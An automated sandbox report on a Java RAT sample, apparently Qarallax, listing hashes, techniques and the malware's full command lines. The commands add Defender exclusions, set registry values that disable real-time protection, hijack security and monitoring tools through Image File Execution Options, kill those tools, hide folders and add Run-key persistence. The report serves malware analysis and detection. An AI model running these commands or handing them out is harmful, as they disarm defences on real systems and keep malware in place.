qarallax | ed73291b590de2675c73c67a0947c25ae4aab545be33c2d26e3b553d95d211bd

Analysis

max time kernel
136s
max time network
147s
platform
windows10_x64
resource
win10v200217
submitted
13-03-2020 03:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SOA.jar
Size

399KB
MD5

d90942cfaf63803a0a51738c3c48dd29
SHA1

f4a8301570fb42742a0108c5f3771d6cd088ee06
SHA256

ed73291b590de2675c73c67a0947c25ae4aab545be33c2d26e3b553d95d211bd
SHA512

91e7634cc9fb9fce6207e25646326e15c7080d9da1b7b76fca30bb3ef2eb6673518bcb4ea1a3d8cce72408db3e51d2dec79c39f74d623dff41827cbec7a2397a

Score

10^/10

qarallax evasion persistence trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001a9ee-37.dat	qarallax_dll

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
3936	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-638615289-2068236702-2426684043-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-638615289-2068236702-2426684043-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DgUQxTW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oObGi\\cAPTv.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-638615289-2068236702-2426684043-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-638615289-2068236702-2426684043-1000\Software\Microsoft\Windows\CurrentVersion\Run\DgUQxTW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oObGi\\cAPTv.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\oObGi\Desktop.ini	java.exe
File created	C:\Users\Admin\oObGi\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\oObGi\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\oObGi\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\JxVcv	java.exe
File opened for modification	C:\Windows\System32\JxVcv	java.exe

Kills process with taskkill 17 IoCs

evasion

pid	Process
4800	taskkill.exe
5820	taskkill.exe
5876	taskkill.exe
6044	taskkill.exe
4656	taskkill.exe
5548	taskkill.exe
4460	taskkill.exe
4196	taskkill.exe
5668	taskkill.exe
5764	taskkill.exe
6100	taskkill.exe
4104	taskkill.exe
4764	taskkill.exe
3480	taskkill.exe
3048	taskkill.exe
5932	taskkill.exe
5988	taskkill.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3848	powershell.exe
3848	powershell.exe
3848	powershell.exe
3848	powershell.exe
3848	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3824	WMIC.exe
Token: SeSecurityPrivilege	3824	WMIC.exe
Token: SeTakeOwnershipPrivilege	3824	WMIC.exe
Token: SeLoadDriverPrivilege	3824	WMIC.exe
Token: SeSystemProfilePrivilege	3824	WMIC.exe
Token: SeSystemtimePrivilege	3824	WMIC.exe
Token: SeProfSingleProcessPrivilege	3824	WMIC.exe
Token: SeIncBasePriorityPrivilege	3824	WMIC.exe
Token: SeCreatePagefilePrivilege	3824	WMIC.exe
Token: SeBackupPrivilege	3824	WMIC.exe
Token: SeRestorePrivilege	3824	WMIC.exe
Token: SeShutdownPrivilege	3824	WMIC.exe
Token: SeDebugPrivilege	3824	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3824	WMIC.exe
Token: SeRemoteShutdownPrivilege	3824	WMIC.exe
Token: SeUndockPrivilege	3824	WMIC.exe
Token: SeManageVolumePrivilege	3824	WMIC.exe
Token: 33	3824	WMIC.exe
Token: 34	3824	WMIC.exe
Token: 35	3824	WMIC.exe
Token: 36	3824	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3824	WMIC.exe
Token: SeSecurityPrivilege	3824	WMIC.exe
Token: SeTakeOwnershipPrivilege	3824	WMIC.exe
Token: SeLoadDriverPrivilege	3824	WMIC.exe
Token: SeSystemProfilePrivilege	3824	WMIC.exe
Token: SeSystemtimePrivilege	3824	WMIC.exe
Token: SeProfSingleProcessPrivilege	3824	WMIC.exe
Token: SeIncBasePriorityPrivilege	3824	WMIC.exe
Token: SeCreatePagefilePrivilege	3824	WMIC.exe
Token: SeBackupPrivilege	3824	WMIC.exe
Token: SeRestorePrivilege	3824	WMIC.exe
Token: SeShutdownPrivilege	3824	WMIC.exe
Token: SeDebugPrivilege	3824	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3824	WMIC.exe
Token: SeRemoteShutdownPrivilege	3824	WMIC.exe
Token: SeUndockPrivilege	3824	WMIC.exe
Token: SeManageVolumePrivilege	3824	WMIC.exe
Token: 33	3824	WMIC.exe
Token: 34	3824	WMIC.exe
Token: 35	3824	WMIC.exe
Token: 36	3824	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe
Token: SeSecurityPrivilege	3480	WMIC.exe
Token: SeTakeOwnershipPrivilege	3480	WMIC.exe
Token: SeLoadDriverPrivilege	3480	WMIC.exe
Token: SeSystemProfilePrivilege	3480	WMIC.exe
Token: SeSystemtimePrivilege	3480	WMIC.exe
Token: SeProfSingleProcessPrivilege	3480	WMIC.exe
Token: SeIncBasePriorityPrivilege	3480	WMIC.exe
Token: SeCreatePagefilePrivilege	3480	WMIC.exe
Token: SeBackupPrivilege	3480	WMIC.exe
Token: SeRestorePrivilege	3480	WMIC.exe
Token: SeShutdownPrivilege	3480	WMIC.exe
Token: SeDebugPrivilege	3480	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3480	WMIC.exe
Token: SeRemoteShutdownPrivilege	3480	WMIC.exe
Token: SeUndockPrivilege	3480	WMIC.exe
Token: SeManageVolumePrivilege	3480	WMIC.exe
Token: 33	3480	WMIC.exe
Token: 34	3480	WMIC.exe
Token: 35	3480	WMIC.exe
Token: 36	3480	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3480	WMIC.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3936	java.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3936 wrote to memory of 3912	3936	java.exe	68
PID 3936 wrote to memory of 3912	3936	java.exe	68
PID 3936 wrote to memory of 3808	3936	java.exe	70
PID 3936 wrote to memory of 3808	3936	java.exe	70
PID 3936 wrote to memory of 3144	3936	java.exe	73
PID 3936 wrote to memory of 3144	3936	java.exe	73
PID 3936 wrote to memory of 3308	3936	java.exe	76
PID 3936 wrote to memory of 3308	3936	java.exe	76
PID 3936 wrote to memory of 2084	3936	java.exe	78
PID 3936 wrote to memory of 2084	3936	java.exe	78
PID 3936 wrote to memory of 3076	3936	java.exe	80
PID 3936 wrote to memory of 3076	3936	java.exe	80
PID 3936 wrote to memory of 3092	3936	java.exe	81
PID 3936 wrote to memory of 3092	3936	java.exe	81
PID 3936 wrote to memory of 3116	3936	java.exe	82
PID 3936 wrote to memory of 3116	3936	java.exe	82
PID 3936 wrote to memory of 3692	3936	java.exe	84
PID 3936 wrote to memory of 3692	3936	java.exe	84
PID 3936 wrote to memory of 740	3936	java.exe	87
PID 3936 wrote to memory of 740	3936	java.exe	87
PID 3936 wrote to memory of 792	3936	java.exe	89
PID 3936 wrote to memory of 792	3936	java.exe	89
PID 3936 wrote to memory of 3644	3936	java.exe	92
PID 3936 wrote to memory of 3644	3936	java.exe	92
PID 3936 wrote to memory of 3848	3936	java.exe	94
PID 3936 wrote to memory of 3848	3936	java.exe	94
PID 3936 wrote to memory of 636	3936	java.exe	95
PID 3936 wrote to memory of 636	3936	java.exe	95
PID 3936 wrote to memory of 3740	3936	java.exe	96
PID 3936 wrote to memory of 3740	3936	java.exe	96
PID 3936 wrote to memory of 3032	3936	java.exe	99
PID 3936 wrote to memory of 3032	3936	java.exe	99
PID 3936 wrote to memory of 3436	3936	java.exe	101
PID 3936 wrote to memory of 3436	3936	java.exe	101
PID 3936 wrote to memory of 3048	3936	java.exe	103
PID 3936 wrote to memory of 3048	3936	java.exe	103
PID 3936 wrote to memory of 3800	3936	java.exe	105
PID 3936 wrote to memory of 3800	3936	java.exe	105
PID 3936 wrote to memory of 1000	3936	java.exe	107
PID 3936 wrote to memory of 1000	3936	java.exe	107
PID 3936 wrote to memory of 1684	3936	java.exe	110
PID 3936 wrote to memory of 1684	3936	java.exe	110
PID 3936 wrote to memory of 4080	3936	java.exe	112
PID 3936 wrote to memory of 4080	3936	java.exe	112
PID 3936 wrote to memory of 2644	3936	java.exe	113
PID 3936 wrote to memory of 2644	3936	java.exe	113
PID 3936 wrote to memory of 4104	3936	java.exe	115
PID 3936 wrote to memory of 4104	3936	java.exe	115
PID 3936 wrote to memory of 4148	3936	java.exe	117
PID 3936 wrote to memory of 4148	3936	java.exe	117
PID 3936 wrote to memory of 4184	3936	java.exe	119
PID 3936 wrote to memory of 4184	3936	java.exe	119
PID 3936 wrote to memory of 4236	3936	java.exe	122
PID 3936 wrote to memory of 4236	3936	java.exe	122
PID 3936 wrote to memory of 4304	3936	java.exe	124
PID 3936 wrote to memory of 4304	3936	java.exe	124
PID 3936 wrote to memory of 4356	3936	java.exe	125
PID 3936 wrote to memory of 4356	3936	java.exe	125
PID 3936 wrote to memory of 4416	3936	java.exe	128
PID 3936 wrote to memory of 4416	3936	java.exe	128
PID 3936 wrote to memory of 4496	3936	java.exe	131
PID 3936 wrote to memory of 4496	3936	java.exe	131
PID 3936 wrote to memory of 4572	3936	java.exe	133
PID 3936 wrote to memory of 4572	3936	java.exe	133

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3308	attrib.exe
2084	attrib.exe
3076	attrib.exe
3092	attrib.exe
3116	attrib.exe
3692	attrib.exe
740	attrib.exe
792	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\SOA.jar
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3936
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3912
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3808
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3824
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3144
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3480
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3308
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:2084
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\oObGi\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3076
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\oObGi\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3092
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\oObGi
  2⤵
  - Views/modifies file attributes
  PID:3116
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\oObGi
  2⤵
  - Views/modifies file attributes
  PID:3692
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\oObGi
  2⤵
  - Views/modifies file attributes
  PID:740
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\oObGi\cAPTv.class
  2⤵
  - Views/modifies file attributes
  PID:792
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\oObGi','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\oObGi\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3848
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:636
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3740
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3032
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:3436
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:3048
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:3800
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1000
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1684
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4080
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2644
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4104
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:4148
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4184
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:4236
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4304
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:4356
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4416
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4496
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:2252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:2692
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4616
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4708
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4756
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4808
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4868
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4908
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:5052
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:5088
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3084
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4248
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4460
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:4128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:4624
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2864
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:4696
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:4740
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:4388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:4444
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4656
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:4488
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:4228
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4508
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:4304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:4824
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:4692
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:4588
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4364
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:5016
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:4720
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4856
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:3228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:4672
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4316
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:4528
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:4872
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:2928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:3824
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5012
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:3252
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:5108
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:3576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:5104
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4196
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4424
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:3952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:3572
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3436
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:4624
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4800
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4796
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4108
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4448
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3440
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4292
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4184
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:3636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
